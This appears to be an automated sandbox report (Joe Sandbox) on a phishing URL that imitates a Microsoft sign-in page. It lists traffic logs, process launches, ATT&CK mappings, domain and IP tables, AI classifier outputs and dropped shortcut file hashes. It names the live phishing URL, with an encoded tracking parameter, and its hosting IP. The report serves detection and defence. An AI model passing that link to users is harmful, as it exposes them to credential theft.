          Source: chromecache_79.1.dr, chromecache_66.1.drString found in binary or memory: https://www.w3schools.com/w3css/4/w3.css
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49738 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49739 version: TLS 1.2
          Source: classification engineClassification label: mal96.phis.win@17/40@16/10
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1896,i,5167075357235610977,1307917269125286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1896,i,5167075357235610977,1307917269125286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          3
          Masquerading
          OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Registry Run Keys / Startup Folder
          1
          Process Injection
          LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
          Non-Application Layer Protocol
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
          Ingress Tool Transfer
          Traffic DuplicationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N0%VirustotalBrowse
          https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N100%SlashNextCredential Stealing type: Phishing & Social Engineering
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          cs837.wac.edgecastcdn.net0%VirustotalBrowse
          chiquitzinbb.com0%VirustotalBrowse
          www.google.com0%VirustotalBrowse
          s-part-0017.t-0009.t-msedge.net0%VirustotalBrowse
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          d2vgu95hoyrpkh.cloudfront.net
          18.245.31.33
          truefalse
            unknown
            chiquitzinbb.com
            157.230.134.73
            truetrueunknown
            cs837.wac.edgecastcdn.net
            192.229.133.221
            truefalseunknown
            s-part-0017.t-0009.t-msedge.net
            13.107.246.45
            truefalseunknown
            sni1gl.wpc.omegacdn.net
            152.199.21.175
            truefalse
              unknown
              www.google.com
              142.250.185.68
              truefalseunknown
              s-part-0039.t-0009.t-msedge.net
              13.107.246.67
              truefalse
                unknown
                aadcdn.msftauth.net
                unknown
                unknownfalse
                  unknown
                  www.w3schools.com
                  unknown
                  unknownfalse
                    unknown
                    cdn.socket.io
                    unknown
                    unknownfalse
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://chiquitzinbb.com/favicon.icotrue
                        unknown
                        https://cdn.socket.io/4.7.5/socket.io.min.jsfalse
                          unknown
                          https://aadcdn.msftauth.net/shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svgfalse
                            unknown
                            https://chiquitzinbb.com/o/jsnom.jstrue
                              unknown
                              https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123Ntrue
                                unknown
                                https://www.w3schools.com/w3css/4/w3.cssfalse
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://cdn.socket.io/4.6.0/socket.io.min.jschromecache_79.1.dr, chromecache_66.1.drfalse
                                    unknown
                                    https://google.comchromecache_79.1.dr, chromecache_66.1.drfalse
                                      unknown
                                      https://aadcdn.msftauth.net/shared/1.0/content/images/appbackgrounds/49_6ffe0a92d779c878835b40171ffcchromecache_79.1.dr, chromecache_66.1.drfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        142.250.185.68
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        13.107.246.45
                                        s-part-0017.t-0009.t-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        13.107.246.67
                                        s-part-0039.t-0009.t-msedge.netUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        18.245.31.78
                                        unknownUnited States
                                        16509AMAZON-02USfalse
                                        18.245.31.33
                                        d2vgu95hoyrpkh.cloudfront.netUnited States
                                        16509AMAZON-02USfalse
                                        192.229.133.221
                                        cs837.wac.edgecastcdn.netUnited States
                                        15133EDGECASTUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        152.199.21.175
                                        sni1gl.wpc.omegacdn.netUnited States
                                        15133EDGECASTUSfalse
                                        157.230.134.73
                                        chiquitzinbb.comUnited States
                                        14061DIGITALOCEAN-ASNUStrue
                                        IP
                                        192.168.2.16
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1540729
                                        Start date and time:2024-10-24 03:39:51 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 38s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal96.phis.win@17/40@16/10
                                        EGA Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.74.206, 142.251.168.84, 199.232.210.172, 34.104.35.123, 172.217.16.202, 142.250.186.170, 142.250.185.202, 142.250.185.106, 142.250.74.202, 142.250.185.138, 216.58.206.42, 142.250.185.74, 142.250.186.42, 142.250.186.106, 142.250.186.138, 172.217.18.106, 216.58.206.74, 172.217.18.10, 172.217.16.138, 142.250.184.202, 142.250.186.99, 216.58.212.131, 172.217.23.110, 142.250.186.174, 142.250.186.46, 142.250.185.174
                                        • Excluded domains from analysis (whitelisted): logincdn.msauth.net, clients1.google.com, fs.microsoft.com, lgincdnmsftuswe2.azureedge.net, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azureedge.net, clients.l.google.com, www.gstatic.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        No simulations
                                        InputOutput
                                        URL: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "contains_trigger_text": true,
                                          "trigger_text": "Trying to sign in",
                                          "prominent_button_name": "Cancel",
                                          "text_input_field_labels": "unknown",
                                          "pdf_icon_visible": false,
                                          "has_visible_captcha": false,
                                          "has_urgent_text": false,
                                          "has_visible_qrcode": false
                                        }
                                        URL: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "brands": []
                                        }
                                        URL: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "contains_trigger_text": true,
                                          "trigger_text": "Sign in",
                                          "prominent_button_name": "Next",
                                          "text_input_field_labels": [
                                            "Email, phone or Skype"
                                          ],
                                          "pdf_icon_visible": false,
                                          "has_visible_captcha": false,
                                          "has_urgent_text": false,
                                          "has_visible_qrcode": false
                                        }
                                        URL: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N Model: claude-3-haiku-20240307
                                        ```json
                                        {
                                          "brands": [
                                            "Microsoft"
                                          ]
                                        }
                                        URL: https://chiquitzinbb.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPWQxbDZOVGc9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N Model: gpt-4o
                                        ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'chiquitzinbb.com' does not match the legitimate domain for Microsoft.",    "The domain name 'chiquitzinbb.com' does not contain any recognizable elements related to Microsoft.",    "The presence of input fields for 'Email, phone or Skype' is typical for Microsoft services, but the domain mismatch is a strong indicator of phishing.",    "The domain 'chiquitzinbb.com' appears unrelated to Microsoft and could be a phishing attempt."  ],  "riskscore": 9}
                                        Google indexed: True
                                        URL: chiquitzinbb.com
                                                    Brands: Microsoft
                                                    Input Fields: Email, phone or Skype
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 00:40:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2673
                                        Entropy (8bit):3.989377221006696
                                        Encrypted:false
                                        SSDEEP:48:8iOdwT0Y8HSidAKZdA1FehwiZUklqehAy+3:88vx/y
                                        MD5:843084CF075D3E0878B90FFBC2F0D918
                                        SHA1:FB478FAA422EF5E36F8DE1EBA3D651AFB93D381A
                                        SHA-256:AFF8A07E30C80E5E99BAF62DCAC0B11B9DD2FD9A6743064A2FFE2D0BBEEB1A2C
                                        SHA-512:FB41D7C6E4B5F83E2DB7A3E1D5904E4BCCD612D44332788E128BBE2C46758907CAADC1108580C46569663060B7A025FA3D2580BB3CC533591C83EDB8751079F6
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,........%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 00:40:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2675
                                        Entropy (8bit):4.002016865700923
                                        Encrypted:false
                                        SSDEEP:48:8rbOdwT0Y8HSidAKZdA1seh/iZUkAQkqehvy+2:8r1vn9Q+y
                                        MD5:5E55E559B97D148C10C39ABB0A9EB223
                                        SHA1:3396356616C286CE243B0C90E3B94B61F844F2F8
                                        SHA-256:049D9A5EAAC60F9B5124278628A14436F75A45C7B057C3191D6A0E21D70CE4B4
                                        SHA-512:E54DDF966CF5F71F831ECB00C37293D431402BE4C44B91B327D5AC3354547B824E36721E6FC34646F262C4DBC12CE9CC6E72D58905AA84E44C65482D65347BB4
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....jM...%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2689
                                        Entropy (8bit):4.0110819257390995
                                        Encrypted:false
                                        SSDEEP:48:8mOdwT0YAHSidAKZdA14meh7sFiZUkmgqeh7sVy+BX:8IvHnLy
                                        MD5:70CA8ACEB94208EF0545D59B701F14D5
                                        SHA1:6241F8E630D2D4C0F7E08750AE0ACF07AA468B85
                                        SHA-256:4EA14E74D5A10D7DBC32E0401B300EC5CFFAA0FA497881B8E769B0A890522F92
                                        SHA-512:7230C429BE855D551E93687CF62EC629B40F693F92ECFE0F40A32902F836FF8A72EEC31F233B31C9DF283E36F63861E75E279DA82BECBD561F984134AA6339F9
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 00:40:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):4.001246884872583
                                        Encrypted:false
                                        SSDEEP:48:8YOdwT0Y8HSidAKZdA1TehDiZUkwqehjy+R:8SvUty
                                        MD5:F271B80EE83F8E35C0793E226872E924
                                        SHA1:5804AFEE62BAA5838785289669F1B87B697441BB
                                        SHA-256:831456F3D0A2B7D52F6F8443CBF4E8F5A5584ED0A2698ACE40C964AFFBCD3919
                                        SHA-512:16339451AD441879AFF109320901DDE62118A35327418C52F09D4AC91BEC99D7C1C237A7352B0E2A80C19EE76395AD8CBE5199C5825FCE2559DFC5A6A5DC7202
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,........%..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 00:40:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9905432032420283
                                        Encrypted:false
